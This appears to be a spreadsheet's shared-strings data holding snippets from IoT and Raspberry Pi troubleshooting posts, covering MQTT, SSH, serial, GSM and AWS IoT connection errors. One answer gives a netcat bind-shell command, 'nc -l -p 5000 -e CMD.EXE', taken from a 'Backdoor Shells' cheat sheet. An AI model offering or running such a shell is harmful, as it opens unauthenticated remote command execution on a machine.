'OK-AT-OK' @/etc/ppp/chatscripts/apn
'OK' 'ATDT*99***1#'
TIMEOUT 30
CONNECT ''
/etc/ppp/chatscripts/my-operator-apn
AT+CGDCONT=1,"IP","&lt;apn-name&gt;"
/etc/ppp/chatscripts/pin.CODE
AT+CPIN=1234
/etc/ppp/chatscripts/pin.NONE
AT
/etc/ppp/chatscripts/mode.3G-only
AT\^SYSCFG=14,2,3fffffff,0,1
/etc/ppp/chatscripts/mode.3G-pref
AT\^SYSCFG=2,2,3fffffff,0,1
/etc/ppp/chatscripts/mode.GPRS-only
AT\^SYSCFG=13,1,3fffffff,0,0
/etc/ppp/chatscripts/mode.GPRS-pref
AT\^SYSCFG=2,1,3fffffff,0,0
The SYSCFG line in the mode.</t>
  </si>
  <si>
    <t>Its getting connected properly but when trying to Subscribe its showing msg " errors subscription to SalilPEkkafeedscheck failed: not a valid topic format" and in publish its showing msg "errors publication to SalilPEkkafeedscheck failed: publish is not authorized, user is temporarily blocked" in the website and in app its showing msg "D/AlarmPingSender: Unregister alarm receiver to MqttServicepaho275649469618164"</t>
  </si>
  <si>
    <t>Failed to load resource: the server responded with a status of 404 (Not Found) 
  or if go from an external ip address:
  GET http://212.204.xxx.xx:xxxx/air.JPG 404 (Not Found)
  (left out a few xxxx for privacy :p)
I've already tried moving the image up and down (also into assets).</t>
  </si>
  <si>
    <t>The static answer effectively hijacks web requests at the DNS level, by forging the DNS answer, causing all host names to resolve to the IP address of a local web server.</t>
  </si>
  <si>
    <t>I want the ESP to sit in a place where I cannot access it using serial once it is installed, so I need to be able to configure it's Wifi-Credentials and the MQTT-Server IP, Port and credentials using WiFi.</t>
  </si>
  <si>
    <t>The problem  I am  facing is that if the last detection was in quadrant 4 and in the next frame there is no detection then all the relays must turn off, but they don't the relay connected to quadrant 4 remains on until a person is detected in any one of the quadrant.</t>
  </si>
  <si>
    <t>Note that devices in our solution do not regularly send push notifications, they only send a push on alarm conditions that may not happen for a long time.</t>
  </si>
  <si>
    <t>Having said this, attempting to establish a WebSocket connection directly so far has proven problematic:
Proxies Many corporate proxies block WebSocket traffic.</t>
  </si>
  <si>
    <t>All users have the checkbox selected to allow internet email and have a internet email address, besides the original admin who I cannot enter an internet email address.</t>
  </si>
  <si>
    <t>port = /dev/ttyAMA0
connection = at115200
# Debugging
#logformat = textall
# SMSD configuration, see gammu-smsdrc(5)
[smsd]
#RunOnReceive = /home/pi/script/sms.sh
service = sql
driver = native_mysql
host = localhost
user = smsd
password = g@mmuP@ssword
database = smsd
logfile = /var/log/smsd
# Increase for debugging information
debuglevel = 0
# Paths where messages are stored
inboxpath = /var/spool/gammu/inbox/
outboxpath = /var/spool/gammu/outbox/
sentsmspath = /var/spool/gammu/sent/
errorsmspath = /var/spool/gammu/error/
I tried the solution given here but it didnt work.</t>
  </si>
  <si>
    <t>Once you get a connection open on port 443 you'll need to run TLS (Transport Layer Security, the 'S' in 'HTTPS') and negotiate a secure connection before you can start handling HTTP over the secure connection.</t>
  </si>
  <si>
    <t>I have the following Processing sketch:
When I run the Processing sketch, the Serial Monitor output gets corrupted.</t>
  </si>
  <si>
    <t>Assign static IP and determine the port number to port forward
Added basic auth to the root directory (read on Apache Basic Auth to add basic login prompt)
Expose the IP (and port number if different than port 80) to public via DNS
Solution below is via noip.com (DNS provider) - free version require confirmation every 30 days.</t>
  </si>
  <si>
    <t>I can connect via ethernet, but have been trying to setup wifi using the recommended Edimax EW7811U, as mentioned here: https://redpitaya.zendesk.com/hc/en-us/articles/200295492-WIFI-connection
I have a Raspberry Pi sitting right next to it, connected with the same type of adapter, and it works fine.</t>
  </si>
  <si>
    <t>The problem is:
I will have to grab the drone and take it upstream 3 times, as there are sensors from many batches, each connecting to the same wifi ssid but with a different password...
My question is:
Is it possible to have a callback in the esp with the currently used password for authenticating, BEFORE allowing/refusing client connection?</t>
  </si>
  <si>
    <t>Some network administrators turn off SSID broadcasting, but a hacker can still sniff the SSID from frames that stations use when associating with an access point.</t>
  </si>
  <si>
    <t>PI-domo has some passwordless ssh login setup to pi-pump, and contains three scripts:
- pump_on.sh: sends value to gpio with ssh to turn pump on and returns 1
pump_off.sh: sends value to gpio with ssh to turn pump off and returns 0 
pump_status.sh: returns 1 if pump is on, 0 if pump is off.</t>
  </si>
  <si>
    <t>Your code will be polling the open connection, but you are avoiding all the back and forth communications to open and close the connection, passing headers back and forth etc.</t>
  </si>
  <si>
    <t>After enabling the SSH server
Next, boot the Pi, and link an Ethernet cable from your laptop directly to the Pi:
On Ubuntu 17.04 to work around this bug as mentioned on this answer you first need:
sudo apt-get install dnsmasq-base
On the host, open the network manager:
nm-connection-editor
And go:
+ sign (Add a new connection)
Ethernet
Create
IPv4 Settings
Method: Shared to other computers
Set a good name for it
Save
Find the IP of the Pi on host:
cat /var/lib/misc/dnsmasq.leases
outputs something like:
1532204957 b8:27:eb:0c:1f:69 10.42.0.160 raspberrypi 01:b8:27:eb:0c:1f:69
10.42.0.160 is the IP, then as usual:
ssh pi@10.42.0.160
I also have the following in my .bashrc:
piip() ( cat /var/lib/misc/dnsmasq.leases | cut -d ' ' -f 3; )
pissh() ( sshpass -p raspberry ssh "pi@$(piip)"; )
From inside the Pi, notice that it can access the internet normally through your host's other interfaces:
ping google.com
For example on my laptop, the Pi takes up the Ethernet, but the host is also connected to the internet through WiFi.</t>
  </si>
  <si>
    <t>All you would do on the Windows box is get your IP address with:
Then you would start listening on some random port, say 5000 because that has no security restrictions and pass whatever arrives on that port to CMD.EXE for execution:
nc -l -p 5000 -e CMD.EXE
Then, on your Raspberry Pi, you would just do:
nc &lt;WINDOWS_IP_ADDRESS&gt; 5000
Now you can type Windows commands in your Rasperry Pi terminal for execution on the Windows box:
DIR
NOTEPAD
There is a "cheatsheet" here and I am using the technique in the section entitled "Backdoor Shells".</t>
  </si>
  <si>
    <t>How to flash genuine HM-10 firmware on CC2541
I had problem close from your problem but for me no matter what I send I don't receive anything even to connected device, but after I upload that firmware, and change Module work mode to 1 (AT+MODE1) become able to send command even from connected device.</t>
  </si>
  <si>
    <t>2019-04-29 14:48:12.006 TRACEID:420de021-715b-d81d-4a5e-daedde37dfd4 PRINCIPALID:AROAIN6B4B4KMSI2U3UEY:CognitoIdentityCredentials [ERROR] EVENT:MQTT Client Connect MESSAGE:Connect Status: AUTHORIZATION_ERROR Failure reason:AUTHORIZATION_FAILURE
NOTE: With cognito user the connection was successful
'''
The connection to the AWS IOT should successful</t>
  </si>
  <si>
    <t>In official documentation from Quectel they let you select  also called Transparent mode where all data sent from UART is sent over tcp connection.</t>
  </si>
  <si>
    <t>When I run the same with other Serial Port viewers, the BT Serial COM port gets detected.</t>
  </si>
  <si>
    <t>Even I execute (then the serial port should respond 'HACK'), it doesn't respond any more..</t>
  </si>
  <si>
    <t>Whenever I try to shutdown or reboot the Raspberry Pi via an SSH connection, the system broadcasts it's halting, but doesn't close the SSH connection.</t>
  </si>
  <si>
    <t>It then attempts a handshake, and if this is successful it sets up the permanent connection.</t>
  </si>
  <si>
    <t>Both of these approaches initiate the connections from the trusted device to Google's servers, so can run without accepting incoming connections.</t>
  </si>
  <si>
    <t>Try doing this
If it prints 'failed' on the serial monitor, double check the 'FIREBASE_HOST' and 'FIREBASE_AUTH'
For me, doing these didn't help.</t>
  </si>
  <si>
    <t>Hi first by the manufacture the Sensor pin(signal) is a digital signal, so the isDetected, must be like this:
Now on loop():
Only one more thing, why the delay()?</t>
  </si>
  <si>
    <t>The TCP connection to the AWS server is established, then the socket associated with the wolfSSL session, and the server's rootCA, client's certificate and private key added to the session (I removed the error handling code):
Here is the full dump with debugging enabled:
And here is the wireshark capture while running the demo:
  324 43.301028126  147.34.2.16  134.86.9.42  DNS 546 Standard query response 0x6223 A a3i4lmgkxatoyr.iot.us-west-2.amazonaws.com CNAME iotmoonraker.us-west-2.prod.iot.us-west-2.amazonaws.com CNAME dualstack.iotmoonraker-u-elb-1w8qnw1336zq-1186348092.us-west-2.elb.amazonaws.com A 52.10.19.111 A 52.25.57.203 A 35.165.44.84 A 35.160.71.83 A 34.210.178.78 A 52.41.23.91 NS ns-560.awsdns-06.net NS ns-1475.awsdns-56.org NS ns-1
769.awsdns-29.co.uk NS ns-332.awsdns-41.com A 205.251.198.233 AAAA 2600:9000:5306:e900::1 A 205.251.193.76 AAAA 2600:9000:5301:4c00::1
  325 43.301247236  134.86.9.42  52.10.19.111 TCP 74 40282  8883 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=1333683979 TSecr=0 WS=128
  328 43.412499273 52.10.19.111  134.86.9.42  TCP 66 8883  40282 [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1360 SACK_PERM=1 WS=256
  329 43.412535130  134.86.9.42  52.10.19.111 TCP 54 40282  8883 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  336 43.413988506  134.86.9.42  52.10.19.111 SSL 196 Client Hello
  339 43.414370228 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [ACK] Seq=1 Ack=143 Win=5888 Len=0
  341 43.533620599 52.10.19.111  134.86.9.42  TCP 1414 [TCP segment of a reassembled PDU]
  342 43.533659332  134.86.9.42  52.10.19.111 TCP 54 40282  8883 [ACK] Seq=143 Ack=1361 Win=32128 Len=0
  343 43.533830301 52.10.19.111  134.86.9.42  TLSv1.2 1283 Server Hello, Certificate, Server Key Exchange, Certificate Request, Server Hello Done
  344 43.533876234  134.86.9.42  52.10.19.111 TCP 54 40282  8883 [ACK] Seq=143 Ack=2590 Win=35072 Len=0
  349 43.545353568  134.86.9.42  52.10.19.111 TLSv1.2 66 Certificate
  350 43.545651974 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [ACK] Seq=2590 Ack=155 Win=5888 Len=0
  351 43.552906179  134.86.9.42  52.10.19.111 TLSv1.2 129 Client Key Exchange
  352 43.553226294 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [ACK] Seq=2590 Ack=230 Win=5888 Len=0
  353 43.553237461  134.86.9.42  52.10.19.111 TLSv1.2 60 Change Cipher Spec
  354 43.553645295 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [ACK] Seq=2590 Ack=236 Win=5888 Len=0
  355 43.553661141  134.86.9.42  52.10.19.111 TLSv1.2 99 Hello Request, Hello Request
  356 43.554058924 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [ACK] Seq=2590 Ack=281 Win=5888 Len=0
  367 43.659283864 52.10.19.111  134.86.9.42  TLSv1.2 61 Alert (Level: Fatal, Description: Bad Certificate)
  368 43.659391034  134.86.9.42  52.10.19.111 TCP 54 40282  8883 [FIN, ACK] Seq=281 Ack=2597 Win=35072 Len=0
  369 43.659472966 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [FIN, ACK] Seq=2597 Ack=281 Win=5888 Len=0
  371 43.659485750  134.86.9.42  52.10.19.111 TCP 54 40282  8883 [ACK] Seq=282 Ack=2598 Win=35072 Len=0
  372 43.659701144 52.10.19.111  134.86.9.42  TCP 60 8883  40282 [ACK] Seq=2598 Ack=282 Win=5888 Len=0
The exact same certificates/keys work with when using mbedTLS.</t>
  </si>
  <si>
    <t>The BluetoothAdapter lets you perform fundamental Bluetooth tasks, such as initiate device discovery, query a list of bonded (paired) devices, instantiate a BluetoothDevice using a known MAC address, and create a BluetoothServerSocket to listen for connection requests from other devices, and start a scan for Bluetooth LE devices.</t>
  </si>
  <si>
    <t>I was successful in controlling the GPIO pins on raspberry pi by using wiring pi library with Eclipse IDE for remote debugging and controlling all GPIO pins.</t>
  </si>
  <si>
    <t>I tried to de-activate the temperature rule, since I thought that maybe, there was some kinda conflict triggering simultaneaously two sending on the same email address, but still the space rule don't send the e-mail.</t>
  </si>
  <si>
    <t>on the other part of the code, I am only colling the same class to use to send method in the same way but here I get an exception which says "TLS authentication error" and the inner exception "Unable to connect to the remote server", "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel".</t>
  </si>
  <si>
    <t>If I set Bluetooth to disconnect when Wifi obtains an IP address, the Https code starts like expected and no crash occurs.</t>
  </si>
  <si>
    <t>Modbus Error: [Input/Output] Modbus Error: [Invalid Message] Incomplete message received, expected at least 2 bytes (0 received)</t>
  </si>
  <si>
    <t>If you're getting a long pause and then a timeout rather than a quick "Connection refused", you almost certainly need to open port 8080 in the local firewall on your server machine.</t>
  </si>
  <si>
    <t>In first, problem could be in internal buffers; In second you probably fulfill Media's input buffer and you locked app (same thread, full buffer cannot receive your input and code to play it and release same buffer is not invoked because writing locks it...)
Also, if you don't doing it now, check for 'frameHeader == null' due to file end.</t>
  </si>
  <si>
    <t>Endpoint URL: XXXXXXX.iot.us-east-2.amazonaws.com
  Root Cert: ./certs/iotRootCA.pem
  Device Cert: ./certs/deviceCert.crt
  Private Key: ./certs/deviceCert.key
  Connecting to AWS IoT Broker... 
  False
  waiting for connection...
  False
  waiting for connection...
  False
  waiting for connection... 
  False
I do not know if there is a problem with AWS IoT...</t>
  </si>
  <si>
    <t>since r305 or other fingerprint sensors dosen't have a lib in C#, I'm trying to use an arduino Uno in between in order to use Adafruit's Lib for Fingerprint sensors.</t>
  </si>
  <si>
    <t>I'm running a headless system with a raspberry pi and after a while of not connecting via ssh the system will stop responding to ssh, it is not the Wi-Fi dongle falling asleep, I have checked, seeing I have a piglow running piglow-sysmon, and the part of the pi glow that monitors network activity does show activity when the pi stops responding to ssh.</t>
  </si>
  <si>
    <t>I'm using this Arduino library to tokenize and parse commands received over a serial port but I have some strange pointer issue.</t>
  </si>
  <si>
    <t>We are trying to send one number (1 or 2) as the state of the servo motor before doing anything, as soon as we connect our app to the Bluetooth HC-06 just to know if the lock is already open or close (we are using EEPROM to not lose the last position of the servo).</t>
  </si>
  <si>
    <t>However when I try to run the setup part of the code:
    while (notConnected)
    {
    if ((gsmAccess.begin(PINNUMBER) == GSM_READY) &amp;
        (gprs.attachGPRS(GPRS_APN, GPRS_LOGIN, GPRS_PASSWORD) == GPRS_READY))
      notConnected = false;
    else
    {
      Serial.println("Not connected");
      delay(1000);
    }
  }
the code doesn't move ahead from the gprs.attachGPRS part.</t>
  </si>
  <si>
    <t>Here is my actual code:
I realized there it wasnt connecting properly to WiFi so i added this piece of code to test:
This is the result im getting in Serial Monitor:
EEPROM CONFIG: [{ SSID:  },
{ Password:  },
{ Device Type:  },
{ Device Name:  }]
STATUS: ?x @?</t>
  </si>
  <si>
    <t>I basically want to have two processes running, one process is to keep a connection open to the server to push and receive messages like offline status and the other is to scan for iBeacons.</t>
  </si>
  <si>
    <t>It should be -
Peripheral advertises
Central discovers peripheral and attempts to connect
PIN is requested if central is not already paired
Connection completes if pairing is successful.</t>
  </si>
  <si>
    <t>What I mean is, 
you can have a user enter some unique ID at a terminal and place their finger as well, 
your Arduino queries your server with that ID as a key, 
the server replies with the fingerprint template associated with that ID, 
the Arduino forwards this template to the module and sends a command to perform a 1:1 match between the template just gotten from your database and the template just generated from the user's finger.</t>
  </si>
  <si>
    <t>In some of the fingerprint sensors I have used, I am able to get the finegrprint "template" off the device (for ex in the: R305 and GT-511C3)
Is there any way for me (open source) to match the minutiae "templates" from these sensors in the cloud or even on the pi itself.</t>
  </si>
  <si>
    <t>I had to switch from the WiFiClientSecure.h library to the WiFiClient.h Library because "client.connect(host, 443)" would never come back as true.</t>
  </si>
  <si>
    <t>Feeling something wrong, I typed this in the terminal:
$ sudo systemctl status assist.service
And I found the error code saying:
google.auth.exceptions.TransportError: HTTPSConnectionPool(host='oauth2.googleapis.com', port=443): Max retries exceeded with url: /token (Caused by NewConnectionError('&lt;urllib3.connection.VerifiedHTTPSConnection object at 0x75b4af70&gt;: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution',))
I can't even understand what the error code exactly means.</t>
  </si>
  <si>
    <t>For example, this exchange results in no lights lit (comments are not in the actual exchange)
Pi sends: !c00144000\r  // create regionId 0 on stripId 0; length 144 offset 0
Pi recieves: O          // positive confirmation?</t>
  </si>
  <si>
    <t>I correctly enter my wi-fi data and I can establish a connection, but when I try to connect to the database the Arduino console I get the following error: setting/number failed:
Code:
I would like to establish a connection with my firebase database.</t>
  </si>
  <si>
    <t>Unhandled Exception: MySql.Data.MySqlClient.MySqlException: Authentication to host '' for user '' using method 'mysql_native_password' failed with message: Access denied for user ''@'localhost' (using password: NO) ---&gt; MySql.Data.MySqlClient.MySqlException: Access denied for user ''@'localhost' (using password: NO)
Also below you can see my app settings file that has my connection information.</t>
  </si>
  <si>
    <t>For example:
For the connection refused issue, make sure to double check all of the MQTT settings:
username is ignored
mqtt.googleapis.com is the host, port 8883 or 443 (maybe try 443?)</t>
  </si>
  <si>
    <t>You can exit the terminal window at any time through
[Ctrl]+[A]
:quit [Enter]
As soon as the FONA board is answering over serial connection, the cellular connection (especially authentication) is the target.</t>
  </si>
  <si>
    <t>It's important to make sure the pair is successful, all HC-06 chips have a default password of "1234"
Once paired, you must go to your bluetooth settings in windows and there will be an advance menu where you can find the outgoing COM port number, this is the number you will use in pyserial to open a serial connection to the HC-06
Tada!</t>
  </si>
  <si>
    <t>I have a problem making my Arduino Ethernet shield to communicate with the server, 
the result on the serial monitor is always:
my arduino code is
the server is an Apache server running on a pc, the server ip address in the code is the pc ip address.</t>
  </si>
  <si>
    <t>I'm trying to setup an Arduino to setup an access point to configure SSID and password for connecting to a Wi-Fi network.</t>
  </si>
  <si>
    <t>Instead of using
ssh.connect(IP[0],username=user[0], pkey=mykey)
I used
ssh.connect("xxx.xxx.x.xxx", username="xyz", pkey=mykey)
stdin, stdout, stderr=ssh.exec_command("ls -l")
Then called in sftp
sftp=ssh.open_sftp()
sftp.put('file/address','file/address')
sftp.close
ssh.close
Even though it worked, I am in some doubt about the code.</t>
  </si>
  <si>
    <t>I'm attempting to establish a connection with the Intel Edison as a central and a regular android phone as a peripheral.</t>
  </si>
  <si>
    <t>However you can use pcap to sniff the network, read the ping reply with the apporpriate pcap filter, and obtain the MAC address from the arriving Ethernet frame.</t>
  </si>
  <si>
    <t>It is
#   supposed to determine listening ports for incoming connections which can be
#   customized anytime.</t>
  </si>
  <si>
    <t>I'm trying to set a connection timeout on a secure wifi connection on arduino-esp32 framework.</t>
  </si>
  <si>
    <t>Example:
1) Peripherial Advertises continuously
2) Central discovers Peripherial and sends connection request
3) Connection is Established and Advertising stops
3) Peripherial authenticates central via AES or Pairing etc.</t>
  </si>
  <si>
    <t>So, the way I'd try to read that packet is a small state machine that just drops corrupt packets on the floor:
Drop characters till you receive a '&lt;' 
Receive up to 6 characters into the buffer.</t>
  </si>
  <si>
    <t>Probably the fastest way around this problem is to avoid the SSL connection altogether and instead upload the videos via SMTP using YouTube's "Upload Via EMAIL" option...
https://support.google.com/youtube/answer/57407?hl=en
Once you get your your unique email address for uploading videos from your YouTube settings page, there are many ways to actually send the email from your RaspberryPi, and you could use straight SMTP without encryption for maximum performance.</t>
  </si>
  <si>
    <t>This method starts an immediate SSL handshake once the connection has been established.</t>
  </si>
  <si>
    <t>You should always check for button press, so you have to check during the loop(), also you need some debounce code, as clickong a button may cause many rapid HIGH - LOW state,  see http://arduino.cc/en/Tutorial/Debounce
pay attention to set right PINNUMBER ora your card will be blocked (instead of a while, try just one time)</t>
  </si>
  <si>
    <t>To make a local DNS server work with DHCP you would want to lock each computers IP address, either at the computer side, or at the router by linking specific MAC addresses to specific IP addresses.</t>
  </si>
  <si>
    <t>But when I want to open that port, it threw me an exception saying that the serial port can't be opened, permission denied.</t>
  </si>
  <si>
    <t>Although wormhole itself will still communicate with port 80 on your device, nginx could listen on port 80 and forward this to another local port of your choosing.</t>
  </si>
  <si>
    <t>I found a suggestion for Arduino: 
client.print(F("GET /1/statuses/user_timeline.xml?screen_name=MYTWITTER HTTP/1.1"));
client.print(F("HOST: api.twitter.com"));
client.print(F("Authorization: OAuth oauth_consumer_key=\"XXX\", oauth_nonce=\"XXX\", oauth_signature=\"XXX\", oauth_signature_method=\"HMAC-SHA1\", oauth_timestamp=\"1361444134\", oauth_token=\"XXX\", oauth_version=\"1.0\""));
client.println();
client.println();
But what is oauth_nonce, oauth_signature and oauth_timestamp supposed to be?</t>
  </si>
  <si>
    <t>Traversal Using Relays around NAT (abbreviated: TURN) is an internet protocol that allows clients to receive connections even if their addresses are translated by middleware like NATS or firewalls.</t>
  </si>
  <si>
    <t>As mentioned in the comments, try:
Removing any  and trailing slash from the Firebase host
Check that the fingerprint that the library uses matches the current fingerprint.</t>
  </si>
  <si>
    <t>Did you check if the ethernet connection is properly established?</t>
  </si>
  <si>
    <t>You should check that the server is indeed started and listening on port 22 and there's no firewall in the way.</t>
  </si>
  <si>
    <t>Connection may still look as active on your Arduino until all resources from your activity are finally cleared from memory, which will effectively kill the connection that was improperly closed on runtime.</t>
  </si>
  <si>
    <t>Check the delay between asserting the tx pin and start of transmission.</t>
  </si>
  <si>
    <t>did not help, the listed reasons are closed ports or firewall and as I already said I tried to open the required ports through the shared Ethernet connection and turned off Windows firewall completely with no other firewall programs running.</t>
  </si>
  <si>
    <t>When I press enter key without entering any data there is no data output on Serial Monitor but WiFi connection is successful.</t>
  </si>
  <si>
    <t>Still get off all the time with your code or constant detection of edge event with the code of @jp-jee
EDIT
Now my code print always pushed when the button is released and print nothing when I push it...</t>
  </si>
  <si>
    <t>It is able to find out certian "keywords" from it's input, perform a search in it's database for an appropriate match and then can reply back with a suitable reply.</t>
  </si>
  <si>
    <t>So my question then becomes, is it possible to develop an app (setup for HID) that will eventually send critical serial data to the arduino to properly actuate the lock/unlock mechanism on the door?</t>
  </si>
  <si>
    <t>I'm running
all works as expected, when I connect to the broker knowing the IP an port:
But how can I discover the IP address of the device running the broker and the port?</t>
  </si>
  <si>
    <t>A serial port cannot be shared, it can only be opened once by a process and everybody else that tries to open it will get the fail-whale ERROR_ACCESS_DENIED error code.</t>
  </si>
  <si>
    <t>[1] This is done by intercepting most packets, regardless of address or port, until the user opens a browser and tries to access the web.</t>
  </si>
  <si>
    <t>I'm trying to develop a simple packet sniffer using Arduino, I just wanted to save the TCP/IP packet information on the memory card, I want to know if there is any way using Arduino Ethernet library or even w5100 library to get access to the received packet's header fields and information.</t>
  </si>
  <si>
    <t>The problem on code below, is that the last line gives this exception:
: Invalid UUID: 86663102937730 
Here is the code:
I've also added this permissions:
&lt;uses-permission android:name="android.permission.BLUETOOTH" /&gt;
&lt;uses-permission android:name="android.permission.BLUETOOTH_ADMIN" /&gt;
&lt;uses-permission android:name="android.permission.BLUETOOTH_PRIVILEGED"/&gt;
&lt;uses-permission android:name="android.permission.READ_PHONE_STATE"/&gt;
Update:
By an answer of @neferpitou, I've update this code:
UUID applicationUUID = UUID.fromString(uuid);
to this:
UUID applicationUUID = UUID.randomUUID();
It works but now my code gives now a NullPointerException on the line with the comment.</t>
  </si>
  <si>
    <t>The timeout needs to make sure that if the button pressed (and the validate command is initated) but no one puts their finger on the machine it timeouts and reverts back to a state where it waits for the validate command.</t>
  </si>
  <si>
    <t>What I'm trying to do is essentially program a digital combination lock that blinks a red LED every time the rotary encoder is rotated one "tick" (in either direction), and blinks a green LED once the right "combination" has been detected.</t>
  </si>
  <si>
    <t>I have a problem, I can not establish a connection with my bluetooth shield, I've been with another application and if the device works, indicated by a light that is connected, but with this app, that does not happen.</t>
  </si>
  <si>
    <t>If the remote device was connected to a WIFI or other local area network this would be relatively straightforward, but as the device connects over 3G this means that it is behind the 3G carriers NAT and so establishing a connection to the device becomes difficult.</t>
  </si>
  <si>
    <t>I need to send a key to the Arduino board so it can activate the RFID sensor and send back to the program the UID read.</t>
  </si>
  <si>
    <t>Watson IoT Devices
Then when connecting my raspberryPi as a gateway in Node-red it keep on failing with message:
15/12/2016  11:25:21msg : string [49]IBMIoT: Error: Connection
  refused: Not authorized
  I created an IoT node in my Raspberry node-red:
  gateway node
So what is the correct way to connect the senseHat onto my raspberry pi as a device and raspberry pi as gateway both in watson iot platform?</t>
  </si>
  <si>
    <t>However, it is possible to work around this limitation by masking one or more address bits using the TWI address mask register TWAMR as documented (somewhat briefly) in e.g.</t>
  </si>
  <si>
    <t>When a dump (or other error signature information) reaches the Microsoft server, it is analyzed and a solution is sent back to the user when one is available.</t>
  </si>
  <si>
    <t>Provided functionality:
Sending Network Packets
Capturing Network Packets
It can capture Ethernet, IPv4, IPv6, ARP/RARP, TCP, UDP, and ICMPv4 packets.</t>
  </si>
  <si>
    <t>By according to the Adafruit library it display only the fingerprint template .But template is different for the same finger and I cannot identify the exact finger by matching from my client software.</t>
  </si>
  <si>
    <t>STOPPED, // stopped and not prepared to play
    ERROR, // an error occured, mediaplayer is reseted
    STOPPING, // startAsync after stop
}
I can't find a solution to do    Stop() -&gt; start(url)   on a player that is already playing a stream, while securing the state of the player (i must take the latency of the network in account)
How can i achieve that ?</t>
  </si>
  <si>
    <t>Or even a way to upload previous matches into the fingerprint sensor flash dynamically (say, in sets of 60 fingerprints, as I would require only 60 per class)
I can provide code to read the sensor, but it is mostly based of Adafruit Library on github.</t>
  </si>
  <si>
    <t>I'm trying to use the Broadcom BCM2835 OTG functionality to use the RPi as a Ethernet gadget in order to establish a network connection with a host (I found this is used with RPi Zero).</t>
  </si>
  <si>
    <t>I'm working on a project and I need to communicate with a fingerprint sensor (gt-511c1r) through the usb port (Uart does not work for me).</t>
  </si>
  <si>
    <t>Safely close connection
Finding out at which port the device is connected sounds challenging to me.</t>
  </si>
  <si>
    <t>The ultimate goal here is to be able to use a Raspberry Pi with a wireless adapter set to monitor mode, to scan all surrounding WiFi devices (even if they only have WiFi turned on and not associated), and keep a log of MAC addresses and timestamps in a local database (e.g.</t>
  </si>
  <si>
    <t>On VM (using NAT) I have port forwarding enabled by:
Host Port -&gt; 2222 Guest Port -&gt; 22
However when I try to ssh from PI1 to PI2:
I get the following error:
I can SSH into the PI2 from my MBP (so I know SSH is correctly set up), but cannot from PI1.</t>
  </si>
  <si>
    <t>The actual problem is apparently a timeout waiting for acknowledgment of the connection by the hub.</t>
  </si>
  <si>
    <t>After uploading the code my ESP-32 doesn't connect to the MQTT broker and outputs this:
I have double checked that the values for the host, username, password, and port are all correct.</t>
  </si>
  <si>
    <t>the problem is related to the HTTPS gateway port: 8243, when starting container according to the file docker-compose.yml it only exposes the port 9443 so you have to add the port 8243 to be able to access from the outside, that's why it works with localhost and after the change with the ip address it generates the error.</t>
  </si>
  <si>
    <t>socat can be used, e.g., as TCP port forwarder (one-shot or daemon), as an
external socksifier, for attacking weak firewalls, as a shell interface to UNIX
sockets, IP6 relay, for redirecting TCP oriented programs to a serial line, to
logically connect serial lines on different computers, or to establish a
relatively secure environment (su and  chroot) for running client or server
shell scripts with network connections.</t>
  </si>
  <si>
    <t>I tried following:
dev version - not help
free memory up to 32kB - not help
captured packets with WireShark: packets contain encrypted data with some lenght, so it is not empty and packet size is less than 2kB buffer size
Can someone please advise me where could be a problem or how to debug it for more info?</t>
  </si>
  <si>
    <t>Create GG group, core
Create a IoT thing and add to GG group
Use certificate and private key of IoT thing to configure for Windows Device Simulator demo app
Create a subscription from IoT thing to IoT cloud
Run the GG core SW on Pi Raspberry
Deploy GG Group
Choose "Test" in IoT console, subscribe to topic "freertos/demos/ggd"
Run the Windows Device Simulator demo app and see the subscription message in IoT console
What I've tried but failed:
Use above certificate and private key of IoT thing to configure the GG discovery demo app of Renesas RX65N-2MB
Run the demo app
Its debug console shows:
I run the demo app in debugging mode and found it cannot send/receive via GGD_SecureConnect_Connect().</t>
  </si>
  <si>
    <t>However, since that moment i've been unable to access the Raspberry via SSH or VNC, I ping to the Raspberry Address and I got positive response, but when I try to connect via SSH I get 
"ssh: connect to host 192.168.1.250 port 22: Connection refused"
Since i'm working headless i'm unable to check what's wrong.</t>
  </si>
  <si>
    <t>There are advices (all this on Window side)...
- enable TCP/IP Client Protocol in SQL Server Configuration Manager
- enable 1433 TCP port for incoming connection in Windows firewall (or disable the firewall)
- switch on and make run automaticly SQL Browser service (might be helpfull)
Make sure that server login is well mapped to the database user and has rights!</t>
  </si>
  <si>
    <t>size(200, 200);
  background(0);
  smooth();
  port = new Serial (this, "COM5", 115200);
  connectTwitter();
}
void connectTwitter() {
  cb.setOAuthConsumerKey(" kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxO ");
  cb.setOAuthConsumerSecret(" kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxO ");
  cb.setOAuthAccessToken("124767053- kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxO ");
  cb.setOAuthAccessTokenSecret(" kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxO ");
  cb.setHttpConnectionTimeout(100000);
  twitter = new TwitterFactory(cb.build()).getInstance();
  println("is twitter null?</t>
  </si>
  <si>
    <t>Once I started it, I could see the pi was doing a bunch of boot activities and finally stopped at:
My IP address is 192.168.2.2
Debian GNU/Linux 7.0 raspberrypi tty1
raspberrypi login: _
I do not have a keyboard to connect to so, I googled around and ssh'd into the pi.</t>
  </si>
  <si>
    <t>Even if you change the group of /sys/class/gpio/export to gpio, and set permissions to allow you to write to it
sudo chgrp gpio /sys/class/gpio/export /sys/class/gpio/unexport
sudo chmod g+rwx /sys/class/gpio/export /sys/class/gpio/unexport
you can export a pin without superuser powers
echo 22 &gt; /sys/class/gpio/export
but the files /sys/class/gpio/gpio22/direction etc.</t>
  </si>
  <si>
    <t>The leaked code was confirmed to be genuine as its output was found to match that of proprietary software using licensed RC4.</t>
  </si>
  <si>
    <t>I dont have and dont want to deal with setting a public address for RPi2, so this is why I need RPi2 to be client, sending data thru websockets to server on public address.</t>
  </si>
  <si>
    <t>A pretty safe way would be:
You'll probably still want to close the connection with a ser.close() after the connection is lost, although you may need to place that in a "try:except" block also.</t>
  </si>
  <si>
